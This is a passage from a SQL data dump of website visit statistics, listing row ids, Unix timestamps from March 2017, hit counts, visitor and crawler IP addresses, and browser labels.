.44.133.162','chrome'),(94506,1489961055,1,1,0,0,'66.249.93.157','chrome'),(94507,1489961237,1,1,0,0,'95.108.179.22','other'),(94508,1489961747,1,1,0,0,'51.255.65.88','other'),(94509,1489962284,1,1,0,0,'51.255.65.56','other'),(94510,1489962322,1,0,1,0,'66.249.64.21',''),(94511,1489962716,1,0,1,0,'66.249.64.59',''),(94512,1489963055,1,1,0,0,'66.249.64.61','chrome'),(94513,1489963359,1,1,0,0,'8.29.198.25','other'),(94514,1489963523,1,1,0,0,'163.172.64.220','other'),(94515,1489963814,1,1,0,0,'51.255.65.33','other'),(94516,1489964087,1,0,1,0,'66.249.64.21',''),(94517,1489964184,1,0,1,0,'66.249.64.24',''),(94518,1489964594,1,1,0,0,'95.108.179.22','other'),(94519,1489965401,1,1,0,0,'180.76.15.148','other'),(94520,1489965623,1,0,1,0,'66.249.64.27',''),(94521,1489965974,1,1,0,0,'163.172.64.182','other'),(94522,1489967236,1,1,0,0,'66.249.64.183','chrome'),(94523,1489967560,1,1,0,0,'95.108.179.22','other'),(94524,1489968268,1,1,0,0,'66.249.64.27','chrome'),(94525,1489968726,1,0,1,0,'66.249.64.57',''),(94526,1489969714,1,0,1,0,'66.249.64.138',''),(94527,1489970123,1,1,0,0,'95.108.179.22','other'),(94528,1489971134,1,0,1,0,'66.249.64.187',''),(94529,1489971300,1,0,1,0,'66.249.64.179',''),(94530,1489974184,1,1,0,0,'8.29.198.27','other'),(94531,1489975458,1,0,1,0,'66.249.64.183',''),(94532,1489975484,1,1,0,0,'66.249.64.21','chrome'),(94533,1489976258,1,1,0,0,'95.108.179.22','other'),(94534,1489976830,1,1,0,0,'157.55.39.92','other'),(94535,1489978717,1,1,0,0,'141.8.183.25','other'),(94536,1489978721,2,2,0,0,'130.193.51.19','other'),(94537,1489978731,2,0,2,0,'66.249.64.143',''),(94538,1489978733,1,1,0,0,'141.8.142.175','other'),(94539,1489979066,1,1,0,0,'207.46.13.49','other'),(94540,1489979877,1,0,1,0,'66.249.64.133',''),(94541,1489980448,1,0,1,0,'157.55.39.45',''),(94542,1489981797,1,1,0,0,'207.46.13.49','other'),(94543,1489982466,1,1,0,0,'141.8.142.25','other'),(94544,1489982552,1,1,0,0,'130.193.51.19','other'),(94545,1489982807,1,1,0,0,'91.196.178.165','chrome'),(94546,1489982957,1,0,1,0,'66.249.64.24',''),(94547,1489984999,1,1,0,0,'164.132.161.31','other'),(94548,1489985001,1,1,0,0,'8.29.198.27','other'),(94549,1489985405,1,0,1,0,'66.249.64.24',''),(94550,1489985560,2,0,2,0,'66.249.64.21',''),(94551,1489986504,1,0,1,0,'207.46.13.120',''),(94552,1489987016,1,0,1,0,'66.249.64.133',''),(94553,1489987086,1,0,1,0,'66.249.64.27',''),(94554,1489987853,1,1,0,0,'51.255.65.68','other'),(94555,1489988009,1,1,0,0,'51.255.65.57','other'),(94556,1489988328,1,1,0,0,'51.255.65.92','other'),(94557,1489988496,1,1,0,0,'91.196.178.70','firefox'),(94558,1489990281,1,1,0,0,'91.196.178.66','firefox'),(94559,1489990554,4,4,0,0,'91.196.178.69','firefox'),(94560,1489990558,1,1,0,0,'66.249.64.24','chrome'),(94561,1489991167,1,1,0,0,'66.249.93.157','chrome'),(94562,1489991263,1,0,1,0,'66.249.64.27',''),(94563,1489991328,1,1,0,0,'180.76.15.137','other'),(94564,1489991492,1,1,0,0,'91.196.178.69','firefox'),(94565,1489991550,1,1,0,0,'91.196.178.70','chrome'),(94566,1489991575,1,1,0,0,'40.77.167.37','other'),(94567,1489991639,1,1,0,0,'51.255.65.35','other'),(94568,1489992002,1,0,1,0,'66.249.64.143',''),(94569,1489992502,1,1,0,0,'91.196.178.70','chrome'),(94570,1489993559,1,1,0,0,'141.8.142.175','other'),(94571,1489995818,1,1,0,0,'8.29.198.26','other'),(94572,1489996407,1,1,0,0,'93.158.152.51','other'),(94573,1489996581,1,1,0,0,'37.53.225.209','firefox'),(94574,1489996915,1,1,0,0,'141.8.183.25','other'),(94575,1489996946,1,1,0,0,'163.172.64.228','other'),(94576,1489997266,1,1,0,0,'91.196.178.132','firefox'),(94577,1489997294,1,1,0,0,'157.55.39.202','other'),(94578,1489997561,1,1,0,0,'141.8.142.61','other'),(94579,1489997645,2,2,0,0,'91.196.178.70','firefox'),(94580,1489997657,1,1,0,0,'91.196.178.65','firefox'),(94581,1489997843,1,1,0,0,'23.101.61.176','other'),(94583,1489997850,1,1,0,0,'37.53.225.209','firefox'),(94584,1489997962,1,1,0,0,'91.196.177.46','firefox'),(94585,1489998024,1,1,0,0,'37.53.99.101','chrome'),(94586,1489998307,1,1,0,0,'40.77.167.112','other'),(94587,1489998447,1,1,0,0,'52.86.176.3','other'),(94588,1489998908,1,1,0,0,'40.77.167.37','other'),(94589,1489999299,1,1,0,0,'31.172.139.229','other'),(94590,1489999358,1,1,0,0,'91.196.177.46','firefox'),(94591,1489999533,1,1,0,0,'164.132.161.46','other'),(94592,1489999891,1,1,0,0,'141.8.142.61','other'),(94593,1490000184,1,1,0,0,'130.180.217.202','chrome'),(94594,1490000315,1,1,0,0,'95.133.16.206','chrome'),(94595,1490000320,1,1,0,0,'91.196.178.66','firefox'),(94596,1490000717,1,1,0,0,'31.172.139.229','other'),(94597,1490001065,1,1,0,0,'66.249.64.133','chrome'),(94598,1490001248,1,1,0,0,'51.255.65.41','other'),(94599,1490001558,1,0,1,0,'66.249.64.24',''),(94600,1490001575,1,0,1,0,'66.249.64.138',''),(94601,1490001686,1,1,0,0,'91.196.178.66','firefox'),(94602,1490001785,1,1,0,0,'95.132.26.167','opera'),(94603,1490002347,1,1,0,0,'91.196.178.65','firefox'),(94604,1490002642,1,1,0,0,'46.201.242.237','firefox'),(94605,1490002861,1,0,1,0,'40.77.167.132',''),(94606,1490002920,1,1,0,0,'163.172.64.243','other'),(94607,1490003063,1,1,0,0,'37.54.19.192','chrome'),(94608,1490003222,2,2,0,0,'40.77.167.37','other'),(94609,1490003437,1,1,0,0,'37.52.101.101','firefox'),(94610,1490003483,1,1,0,0,'130.193.50.4','other'),(94611,1490003838,1,1,0,0,'130.193.50.6','other'),(94612,1490003850,1,0,1,0,'68.180.229.99',''),(94613,1490004117,1,1,0,0,'91.196.178.66','firefox'),(94614,1490004146,1,1,0,0,'91.196.178.66','chrome'),(94615,1490004205,1,1,0,0,'195.49.151.99','chrome'),(94616,1490004230,1,1,0,0,'141.8.142.62','other'),(94617,1490004248,1,1,0,0,'141.8.142.61','other'),(94618,1490004551,1,1,0,0,'91.209.11.236','other'),(94619,1490004737,1,1,0,0,'51.255.65.87','other'),(94620,1490005447,1,1,0,0,'37.54.1.6','chrome'),(94621,1490005588,1,1,0,0,'93.74.212.147','firefox'),(94622,1490006346,1,1,0,0,'66.249.93.205','chrome'),(94623,1490006419,1,1,0,0,'46.211.154.114','chrome'),(94625,1490006561,1,1,0,0,'91.196.177.46','firefox'),(94626,1490006642,1,1,0,0,'8.29.198.25','other'),(94627,1490006699,23,23,0,0,'94.199.151.22','other'),(94628,1490007897,1,1,0,0,'193.19.152.14','firefox'),(94629,1490008529,1,1,0,0,'91.209.11.236','other'),(94630,1490008550,1,1,0,0,'37.204.99.213','chrome'),(94631,1490009057,1,0,1,0,'66.249.64.24',''),(94632,1490010027,1,1,0,0,'163.172.64.224','other'),(94633,1490010483,3,3,0,0,'141.8.142.175','other'),(94634,1490010502,1,1,0,0,'95.108.179.22','other'),(94635,1490010774,1,1,0,0,'164.132.161.77','other'),(94636,1490011837,1,1,0,0,'46.175.164.122','chrome'),(94637,1490013181,1,1,0,0,'91.196.178.131','chrome'),(94638,1490013356,1,0,1,0,'66.249.64.179',''),(94639,1490013699,1,1,0,0,'91.196.178.70','firefox'),(94640,1490013726,1,1,0,0,'91.196.178.165','firefox'),(94641,1490013792,1,1,0,0,'95.69.254.62','chrome'),(94642,1490013888,1,1,0,0,'51.255.65.37','other'),(94643,1490013951,1,1,0,0,'130.180.217.126','chrome'),(94644,1490014089,1,1,0,0,'91.196.178.66','chrome'),(94645,1490014298,1,1,0,0,'163.172.64.241','other'),(94646,1490014397,1,1,0,0,'92.113.136.87','chrome'),(94647,1490014410,1,1,0,0,'5.255.253.10','other'),(94648,1490014413,1,1,0,0,'130.193.50.6','other'),(94649,1490014483,1,0,1,0,'66.249.64.61',''),(94650,1490014539,2,2,0,0,'69.30.198.202','other'),(94651,1490014698,1,1,0,0,'91.196.178.165','firefox'),(94652,1490014925,1,1,0,0,'164.132.161.94','other'),(94653,1490015371,1,1,0,0,'163.172.64.242','other'),(94654,1490015423,2,2,0,0,'95.108.179.22','other'),(94655,1490015598,1,1,0,0,'130.180.218.66','chrome'),(94656,1490015762,1,0,1,0,'66.249.64.133',''),(94657,1490015918,1,1,0,0,'66.249.64.27','chrome'),(94658,1490016232,1,1,0,0,'46.201.240.112','chrome'),(94659,1490016453,1,1,0,0,'91.196.178.166','firefox'),(94660,1490016516,1,0,1,0,'66.249.64.179',''),(94661,1490016988,1,1,0,0,'91.196.178.65','chrome'),(94662,1490017382,1,0,1,0,'66.249.64.187',''),(94663,1490017466,1,1,0,0,'8.29.198.27','other'),(94664,1490018051,1,0,1,0,'66.249.64.138',''),(94665,1490018161,1,1,0,0,'91.196.178.69','chrome'),(94666,1490018409,1,1,0,0,'91.196.178.161','firefox'),(94667,1490018423,1,1,0,0,'5.255.253.67','other'),(94668,1490018629,1,1,0,0,'164.132.161.51','other'),(94669,1490018635,1,1,0,0,'91.196.178.71','firefox'),(94670,1490018995,1,1,0,0,'164.132.161.84','other'),(94671,1490019040,1,1,0,0,'52.86.176.3','other'),(94672,1490019717,1,1,0,0,'163.172.64.180','other'),(94673,1490019809,1,1,0,0,'94.178.74.70','chrome'),(94674,1490020109,1,1,0,0,'37.53.162.143','chrome'),(94675,1490020454,1,1,0,0,'91.196.177.46','firefox'),(94676,1490021307,1,1,0,0,'51.255.65.93','other'),(94677,1490021646,1,1,0,0,'178.92.251.77','chrome'),(94678,1490022434,1,1,0,0,'66.249.64.61','chrome'),(94679,1490022522,1,1,0,0,'141.8.142.58','other'),(94680,1490022526,1,1,0,0,'130.193.51.14','other'),(94681,1490022530,1,1,0,0,'141.8.183.25','other'),(94682,1490023049,1,1,0,0,'178.92.75.251','chrome'),(94683,1490023544,1,1,0,0,'141.8.142.58','other'),(94684,1490023564,1,1,0,0,'141.8.142.67','other'),(94685,1490023574,1,1,0,0,'141.8.142.61','other'),(94686,1490023672,1,1,0,0,'163.172.64.183','other'),(94687,1490024331,1,0,1,0,'66.249.64.187',''),(94688,1490024495,2,2,0,0,'141.8.142.175','other'),(94689,1490024762,1,1,0,0,'157.55.39.202','other'),(94690,1490024826,1,0,1,0,'66.249.64.133',''),(94691,1490025091,1,1,0,0,'40.77.167.33','other'),(94692,1490025112,1,1,0,0,'130.193.51.19','other'),(94693,1490025397,1,0,1,0,'66.249.64.24',''),(94694,1490025964,1,1,0,0,'141.8.142.58','other'),(94695,1490026722,1,1,0,0,'91.196.178.163','chrome'),(94696,1490027260,1,1,0,0,'141.8.142.58','other'),(94697,1490027629,1,1,0,0,'46.211.66.197','chrome'),(94698,1490027826,1,1,0,0,'141.8.183.25','other'),(94699,1490027894,1,1,0,0,'91.196.178.65','firefox'),(94700,1490028286,1,1,0,0,'8.29.198.25','other'),(94701,1490028934,1,1,0,0,'164.132.161.60','other'),(94702,1490029665,1,1,0,0,'163.172.68.123','other'),(94703,1490029850,1,1,0,0,'95.132.11.232','chrome'),(94704,1490030452,2,2,0,0,'91.209.11.236','other'),(94705,1490031174,1,1,0,0,'95.108.179.22','other'),(94706,1490032052,1,1,0,0,'207.46.13.15','other'),(94707,1490032174,1,1,0,0,'54.191.244.235','msie'),(94708,1490032842,1,0,1,0,'66.249.64.27',''),(94709,1490033100,1,1,0,0,'51.255.65.76','other'),(94710,1490033277,1,1,0,0,'163.172.69.178','other'),(94711,1490033501,1,1,0,0,'163.172.64.223','other'),(94712,1490033672,1,0,1,0,'66.249.64.187',''),(94713,1490033871,1,1,0,0,'66.102.9.27','chrome'),(94714,1490035299,1,0,1,0,'66.249.64.187',''),(94715,1490035611,1,1,0,0,'91.209.11.236','other'),(94716,1490036052,1,1,0,0,'130.193.50.34','other'),(94717,1490036084,39,39,0,0,'82.193.100.107','other'),(94718,1490036385,1,1,0,0,'66.249.93.158','chrome'),(94719,1490036922,1,1,0,0,'91.196.178.67','chrome'),(94720,1490037547,1,1,0,0,'91.209.11.236','other'),(94721,1490038467,1,1,0,0,'163.172.64.230','other'),(94722,1490038591,1,0,1,0,'66.249.64.61',''),(94723,1490038705,1,0,1,0,'66.249.64.138',''),(94724,1490039131,1,1,0,0,'8.29.198.26','other'),(94725,1490039150,1,1,0,0,'46.211.136.25','chrome'),(94726,1490039350,1,0,1,0,'66.249.64.143',''),(94727,1490039553,1,1,0,0,'141.8.142.175','other'),(94728,1490039554,1,0,1,0,'66.249.64.59',''),(94729,1490040176,1,1,0,0,'66.102.9.40','chrome'),(94730,1490041185,1,1,0,0,'91.209.11.236','other'),(94731,1490042581,1,1,0,0,'46.211.155.199','other'),(94732,1490044288,2,0,2,0,'66.249.64.183',''),(94733,1490046673,1,1,0,0,'141.8.142.67','other'),(94734,1490047043,1,1,0,0,'163.172.64.226','other'),(94735,1490047540,1,0,1,0,'207.46.13.15',''),(94736,1490047849,1,0,1,0,'66.249.64.61',''),(94737,1490047974,1,1,0,0,'163.172.71.90','other'),(94738,1490048380,2,2,0,0,'141.8.183.25','other'),(94739,1490048387,1,1,0,0,'95.108.179.18','other'),(94740,1490048395,1,1,0,0,'130.193.51.74','other'),(94741,1490048401,1,1,0,0,'95.108.179.22','other'),(94742,1490048405,1,1,0,0,'130.193.50.34','other'),(94743,1490048628,1,1,0,0,'157.55.39.172','other'),(94744,1490049801,1,1,0,0,'66.249.64.57','chrome'),(94745,1490049856,1,1,0,0,'40.77.167.33','other'),(94746,1490049962,1,1,0,0,'8.29.198.26','other'),(94747,1490051362,1,1,0,0,'5.83.20.37','firefox'),(94748,1490051484,1,1,0,0,'163.172.64.245','other'),(94749,1490051538,1,1,0,0,'51.255.65.70','other'),(94750,1490052390,1,1,0,0,'164.132.161.84','other'),(94751,1490052470,1,1,0,0,'157.55.39.172','other'),(94752,1490053771,1,0,1,0,'66.249.64.187',''),(94753,1490053791,1,1,0,0,'164.132.161.42','other'),(94754,1490055157,1,1,0,0,'37.53.8.232','chrome'),(94755,1490055173,1,1,0,0,'95.108.179.22','other'),(94756,1490056056,1,1,0,0,'66.249.64.179','chrome'),(94757,1490057323,1,0,1,0,'66.249.64.21',''),(94758,1490058717,1,1,0,0,'164.132.161.28','other'),(94759,1490058957,1,0,1,0,'66.249.64.59',''),(94760,1490060053,1,0,1,0,'66.249.64.21',''),(94761,1490060793,1,1,0,0,'8.29.198.26','other'),(94762,1490061644,1,0,1,0,'66.249.64.179',''),(94763,1490062230,1,1,0,0,'164.132.161.4','other'),(94764,1490063165,1,0,1,0,'66.249.64.24',''),(94765,1490063326,1,1,0,0,'66.249.64.179','chrome'),(94766,1490063336,1,1,0,0,'91.209.11.236','other'),(94767,1490063448,1,1,0,0,'66.249.64.138','chrome'),(94768,1490065347,1,1,0,0,'164.132.161.25','other'),(94769,1490065499,1,1,0,0,'163.172.64.217','other'),(94770,1490065652,1,0,1,0,'66.249.64.143',''),(94771,1490066805,1,1,0,0,'91.209.11.236','other'),(94772,1490067686,1,1,0,0,'51.255.65.95','other'),(94773,1490067832,1,1,0,0,'5.255.253.26','other'),(94774,1490067836,1,1,0,0,'5.255.253.68','other'),(94775,1490069022,1,1,0,0,'51.255.65.72','other'),(94776,1490069730,1,0,1,0,'66.249.64.133',''),(94777,1490071006,1,1,0,0,'91.209.11.236','other'),(94778,1490071024,1,1,0,0,'164.132.161.41','other'),(94779,1490071203,1,1,0,0,'5.255.253.47','other'),(94780,1490071226,1,1,0,0,'66.249.64.27','chrome'),(94781,1490071242,2,1,1,0,'66.249.64.21',''),(94782,1490071632,1,1,0,0,'8.29.198.25','other'),(94783,1490072640,1,1,0,0,'163.172.64.216','other'),(94784,1490072987,1,1,0,0,'164.132.161.68','other'),(94785,1490072991,1,1,0,0,'91.209.11.236','other'),(94786,1490073436,1,0,1,0,'66.249.64.27',''),(94787,1490073488,1,0,1,0,'66.249.64.24',''),(94788,1490074469,1,1,0,0,'91.196.178.68','firefox'),(94789,1490074883,1,1,0,0,'52.86.176.3','other'),(94790,1490075089,1,1,0,0,'164.132.161.61','other'),(94791,1490076075,1,1,0,0,'95.108.179.22','other'),(94792,1490076098,1,1,0,0,'208.43.225.84','other'),(94793,1490076876,1,0,1,0,'66.249.64.24',''),(94794,1490077209,1,1,0,0,'91.196.178.65','chrome'),(94795,1490077485,1,0,1,0,'66.249.64.133',''),(94796,1490077545,1,1,0,0,'91.196.177.46','firefox'),(94797,1490077734,1,1,0,0,'180.76.15.33','other'),(94798,1490078703,1,0,1,0,'66.249.64.143',''),(94799,1490078722,1,0,1,0,'66.249.64.27',''),(94800,1490078819,1,1,0,0,'163.172.71.13','other'),(94801,1490078853,1,1,0,0,'91.196.178.65','firefox'),(94802,1490078988,1,1,0,0,'52.86.176.3','other'),(94803,1490079057,1,1,0,0,'91.196.178.162','firefox'),(94804,1490079066,1,1,0,0,'195.49.151.99','chrome'),(94805,1490079277,2,2,0,0,'91.196.178.72','firefox'),(94806,1490080021,1,1,0,0,'51.255.65.29','other'),(94807,1490080418,1,1,0,0,'91.196.178.162','firefox'),(94808,1490080768,1,0,1,0,'66.249.64.143',''),(94809,1490080872,1,1,0,0,'91.196.178.72','firefox'),(94810,1490081166,1,1,0,0,'91.196.178.161','chrome'),(94811,1490081327,1,1,0,0,'85.223.211.12','chrome'),(94812,1490081421,1,1,0,0,'91.196.178.65','firefox'),(94813,1490081476,1,1,0,0,'178.92.159.95','firefox'),(94814,1490081679,1,1,0,0,'91.196.178.162','firefox'),(94815,1490082131,1,1,0,0,'104.45.18.178','other'),(94816,1490082461,1,1,0,0,'8.29.198.25','other'),(94817,1490082537,1,1,0,0,'66.249.64.24','chrome'),(94818,1490082755,1,1,0,0,'91.196.178.67','firefox'),(94819,1490082826,1,1,0,0,'164.132.161.95','other'),(94820,1490083128,1,1,0,0,'91.196.178.69','firefox'),(94821,1490083365,1,1,0,0,'91.196.178.167','firefox'),(94822,1490083506,1,1,0,0,'91.196.178.165','chrome'),(94823,1490084011,1,1,0,0,'95.132.202.137','chrome'),(94824,1490084202,1,0,1,0,'66.249.64.27',''),(94825,1490084379,1,1,0,0,'91.196.178.167','firefox'),(94826,1490084822,1,1,0,0,'91.196.178.67','firefox'),(94827,1490084994,1,1,0,0,'91.196.178.69','firefox'),(94828,1490085177,1,1,0,0,'91.196.178.103','chrome'),(94829,1490085186,1,1,0,0,'52.86.176.3','other'),(94830,1490085266,1,1,0,0,'31.43.2.199','chrome'),(94831,1490085307,1,1,0,0,'5.83.23.3','chrome'),(94832,1490085710,1,1,0,0,'62.210.103.31','other'),(94833,1490085988,1,1,0,0,'91.196.178.167','firefox'),(94834,1490086010,1,1,0,0,'130.180.220.195','firefox'),(94835,1490086104,1,1,0,0,'66.249.64.143','chrome'),(94836,1490086313,1,1,0,0,'91.196.178.69','firefox'),(94837,1490086679,1,1,0,0,'141.8.142.25','other'),(94838,1490086716,1,1,0,0,'141.8.142.58','other'),(94839,1490086721,1,1,0,0,'95.108.179.18','other'),(94840,1490087000,1,1,0,0,'213.231.25.15','chrome'),(94841,1490087190,1,1,0,0,'66.249.64.143','chrome'),(94842,1490087214,1,0,1,0,'66.249.64.133',''),(94843,1490087217,1,1,0,0,'163.172.64.191','other'),(94844,1490087699,1,1,0,0,'66.249.64.133','chrome'),(94845,1490087722,1,1,0,0,'46.201.242.237','firefox'),(94846,1490088199,1,1,0,0,'163.172.64.235','other'),(94847,1490089131,2,2,0,0,'91.196.178.67','chrome'),(94848,1490089674,1,1,0,0,'207.46.13.15','other'),(94849,1490089843,2,2,0,0,'37.53.89.22','chrome'),(94850,1490090150,1,1,0,0,'178.92.251.194','chrome'),(94851,1490090170,1,0,1,0,'66.249.64.24',''),(94852,1490090631,1,0,1,0,'66.249.64.133',''),(94853,1490090750,1,1,0,0,'91.196.178.39','chrome'),(94854,1490090757,1,1,0,0,'91.196.178.167','firefox'),(94855,1490090767,1,1,0,0,'130.193.50.34','other'),(94856,1490091111,1,1,0,0,'51.255.65.24','other'),(94857,1490091177,1,1,0,0,'66.249.64.143','chrome'),(94858,1490091945,1,1,0,0,'95.24.235.80','msie'),(94859,1490091956,1,1,0,0,'141.0.12.159','other'),(94860,1490092379,1,1,0,0,'95.132.38.149','firefox'),(94861,1490092514,2,2,0,0,'40.77.167.33','other'),(94862,1490092705,1,1,0,0,'51.255.65.62','other'),(94863,1490093028,1,1,0,0,'91.196.178.136','firefox'),(94864,1490093111,1,1,0,0,'95.108.179.22','other'),(94865,1490093292,1,1,0,0,'8.29.198.26','other'),(94866,1490093696,1,1,0,0,'66.249.64.138','chrome'),(94867,1490093764,1,1,0,0,'95.132.38.149','firefox'),(94868,1490093929,1,1,0,0,'78.111.190.159','firefox'),(94869,1490094817,1,0,1,0,'66.249.64.21',''),(94870,1490095611,1,1,0,0,'91.196.178.162','chrome'),(94871,1490095615,1,1,0,0,'93.171.243.95','chrome'),(94872,1490095648,1,1,0,0,'130.193.50.34','other'),(94873,1490095698,2,2,0,0,'46.201.242.237','firefox'),(94874,1490096175,1,1,0,0,'91.196.178.167','firefox'),(94875,1490096453,1,1,0,0,'141.8.142.61','other'),(94876,1490096975,1,1,0,0,'91.196.178.164','firefox'),(94877,1490097470,1,0,1,0,'66.249.64.27',''),(94878,1490097921,2,2,0,0,'91.196.178.66','firefox'),(94879,1490098528,1,1,0,0,'91.196.178.164','firefox'),(94880,1490098659,1,1,0,0,'91.196.178.72','firefox'),(94881,1490099347,1,0,1,0,'66.249.64.27',''),(94882,1490099854,1,1,0,0,'66.249.83.74','chrome'),(94883,1490099855,1,1,0,0,'66.249.83.76','chrome'),(94884,1490100200,1,0,1,0,'66.249.64.21',''),(94885,1490100473,1,0,1,0,'66.249.64.143',''),(94886,1490100560,2,2,0,0,'91.196.178.72','firefox'),(94887,1490100768,1,0,1,0,'66.249.64.27',''),(94888,1490101455,1,0,1,0,'66.249.64.133',''),(94889,1490101661,4,4,0,0,'91.196.178.72','firefox'),(94890,1490101818,1,1,0,0,'66.249.64.138','chrome'),(94891,1490102370,1,1,0,0,'91.124.129.202','chrome'),(94892,1490102575,3,3,0,0,'91.196.178.72','firefox'),(94893,1490103102,1,1,0,0,'91.196.178.67','chrome'),(94894,1490103153,1,1,0,0,'91.196.178.135','chrome'),(94895,1490103207,1,0,1,0,'66.249.64.27',''),(94896,1490103782,1,1,0,0,'178.93.184.42','firefox'),(94897,1490103857,1,1,0,0,'78.111.187.186','chrome'),(94898,1490104020,1,1,0,0,'91.196.178.67','chrome'),(94899,1490104026,1,0,1,0,'66.249.64.57',''),(94900,1490104121,1,1,0,0,'8.29.198.26','other'),(94901,1490105120,1,1,0,0,'91.124.158.104','chrome'),(94902,1490105256,1,0,1,0,'66.249.64.24',''),(94903,1490105487,1,1,0,0,'91.196.178.67','chrome'),(94904,1490105715,1,1,0,0,'82.207.91.234','firefox'),(94905,1490105768,1,0,1,0,'40.77.167.33',''),(94906,1490106568,1,1,0,0,'195.49.151.99','chrome'),(94907,1490106826,1,1,0,0,'91.124.129.202','chrome'),(94908,1490106852,1,1,0,0,'130.193.51.74','other'),(94909,1490106984,1,1,0,0,'180.76.15.33','other'),(94910,1490107563,1,1,0,0,'46.48.13.161','chrome'),(94911,1490107782,1,1,0,0,'130.193.50.34','other'),(94912,1490107805,1,1,0,0,'180.76.15.142','other'),(94913,1490107817,1,1,0,0,'164.132.161.85','other'),(94914,1490108544,1,0,1,0,'40.77.167.33',''),(94915,1490108582,1,1,0,0,'91.196.178.66','firefox'),(94916,1490109583,1,1,0,0,'164.132.161.76','other'),(94917,1490109624,1,0,1,0,'66.249.64.59',''),(94918,1490109703,1,1,0,0,'66.249.93.158','chrome'),(94919,1490110563,1,1,0,0,'51.255.65.53','other'),(94920,1490111144,1,1,0,0,'130.193.51.14','other'),(94921,1490111148,1,1,0,0,'93.158.152.51','other'),(94922,1490111410,2,2,0,0,'193.254.196.141','chrome'),(94923,1490112089,1,1,0,0,'91.196.178.66','firefox'),(94924,1490112134,2,2,0,0,'91.209.11.236','other'),(94925,1490112378,1,1,0,0,'63.243.252.123','other'),(94926,1490112611,1,1,0,0,'164.132.161.39','other'),(94927,1490112768,1,1,0,0,'95.135.88.162','firefox'),(94928,1490112789,1,1,0,0,'91.196.178.35','chrome'),(94929,1490113638,1,0,1,0,'66.249.64.27',''),(94930,1490113704,1,1,0,0,'91.209.11.236','other'),(94931,1490114124,1,0,1,0,'40.77.167.33',''),(94932,1490114261,2,0,2,0,'66.249.64.57',''),(94933,1490114485,1,1,0,0,'46.48.13.161','chrome'),(94934,1490114720,1,0,1,0,'66.249.64.179',''),(94935,1490114958,1,1,0,0,'8.29.198.25','other'),(94936,1490115244,1,1,0,0,'66.249.64.183','chrome'),(94937,1490115868,1,0,1,0,'40.77.167.33',''),(94938,1490115920,2,2,0,0,'130.193.50.34','other'),(94939,1490117357,1,0,1,0,'66.249.64.179',''),(94941,1490117377,1,1,0,0,'91.196.178.66','firefox'),(94942,1490118326,1,0,1,0,'66.249.64.187',''),(94943,1490118914,1,0,1,0,'157.55.39.172',''),(94944,1490118999,1,1,0,0,'91.196.178.135','chrome'),(94945,1490119220,1,1,0,0,'195.5.62.210','chrome'),(94946,1490119740,1,1,0,0,'51.255.65.34','other'),(94947,1490119808,1,1,0,0,'66.102.9.27','chrome'),(94948,1490119927,1,1,0,0,'92.113.189.32','firefox'),(94949,1490121306,6,6,0,0,'5.9.61.111','other'),(94950,1490121708,1,1,0,0,'157.55.39.172','other'),(94951,1490122710,1,1,0,0,'46.48.13.161','chrome'),(94952,1490123105,1,1,0,0,'40.77.167.33','other'),(94953,1490124596,1,0,1,0,'66.249.64.59',''),(94954,1490125043,2,1,1,0,'66.249.64.183',''),(94955,1490125629,1,1,0,0,'46.211.252.190','chrome'),(94956,1490125765,1,1,0,0,'66.249.64.61','chrome'),(94957,1490125783,1,1,0,0,'8.29.198.26','other'),(94958,1490126444,1,1,0,0,'91.196.178.166','chrome'),(94959,1490126644,1,1,0,0,'141.8.142.61','other'),(94960,1490128440,1,1,0,0,'51.255.65.42','other'),(94961,1490128450,1,1,0,0,'164.132.161.7','other'),(94962,1490128691,1,1,0,0,'31.31.101.39','firefox'),(94963,1490129242,1,1,0,0,'195.10.210.49','firefox'),(94964,1490130792,1,1,0,0,'46.48.13.161','chrome'),(94965,1490131083,1,0,1,0,'66.249.64.187',''),(94966,1490132493,1,1,0,0,'164.132.161.91','other'),(94967,1490132550,1,0,1,0,'157.55.39.172',''),(94968,1490132675,1,1,0,0,'157.55.39.172','other'),(94969,1490133043,1,1,0,0,'66.249.93.156','chrome'),(94970,1490133506,1,1,0,0,'213.179.252.157','firefox'),(94971,1490133560,1,1,0,0,'66.249.64.187','chrome'),(94972,1490133955,1,0,1,0,'207.46.13.15',''),(94973,1490134833,1,1,0,0,'163.172.64.189','other'),(94974,1490135552,1,1,0,0,'51.255.65.95','other'),(94975,1490136620,1,1,0,0,'8.29.198.26','other'),(94976,1490137146,1,1,0,0,'95.132.134.250','firefox'),(94977,1490137424,1,0,1,0,'66.249.64.183',''),(94978,1490138093,1,1,0,0,'51.255.65.3','other'),(94979,1490138766,1,1,0,0,'51.255.65.66','other'),(94980,1490138878,1,1,0,0,'46.48.13.161','chrome'),(94981,1490139794,1,1,0,0,'164.132.161.47','other'),(94982,1490140610,1,0,1,0,'66.249.64.183',''),(94983,1490140995,1,1,0,0,'66.249.64.179','chrome'),(94984,1490142155,1,0,1,0,'66.249.64.179',''),(94985,1490143317,1,0,1,0,'157.55.39.172',''),(94986,1490144689,1,1,0,0,'180.76.15.142','other'),(94987,1490144824,1,1,0,0,'66.249.64.183','chrome'),(94988,1490145386,1,0,1,0,'66.249.64.57',''),(94989,1490146046,1,1,0,0,'52.86.176.3','other'),(94990,1490147327,1,1,0,0,'51.255.65.81','other'),(94991,1490147448,1,1,0,0,'8.29.198.27','other'),(94992,1490147772,1,1,0,0,'141.8.142.61','other'),(94993,1490149737,1,1,0,0,'91.209.11.236','other'),(94994,1490150106,1,0,1,0,'40.77.167.33',''),(94995,1490150940,2,2,0,0,'46.48.13.161','chrome'),(94996,1490151142,1,1,0,0,'141.8.142.78','other'),(94997,1490151399,1,1,0,0,'164.132.161.12','other'),(94998,1490151934,1,1,0,0,'164.132.161.86','other'),(94999,1490153142,1,1,0,0,'51.255.65.14','other'),(95000,1490153225,1,1,0,0,'173.242.114.66','other'),(95001,1490154181,1,1,0,0,'52.86.176.3','other'),(95002,1490154310,1,1,0,0,'68.64.160.14','chrome'),(95003,1490156025,1,1,0,0,'141.8.132.30','other'),(95004,1490157859,1,0,1,0,'40.77.167.112',''),(95005,1490158280,1,1,0,0,'8.29.198.26','other'),(95006,1490159559,1,0,1,0,'66.249.64.61',''),(95007,1490160779,1,0,1,0,'66.249.64.183',''),(95008,1490160952,1,1,0,0,'40.77.167.33','other'),(95009,1490160974,1,1,0,0,'91.196.178.72','firefox'),(95010,1490161726,1,1,0,0,'66.249.93.156','chrome'),(95011,1490162406,1,1,0,0,'91.196.178.69','firefox'),(95012,1490162645,1,1,0,0,'130.193.50.34','other'),(95013,1490163861,1,1,0,0,'91.196.178.164','chrome'),(95014,1490164179,1,1,0,0,'91.196.178.66','chrome'),(95015,1490164227,2,2,0,0,'91.196.178.165','chrome'),(95016,1490164786,1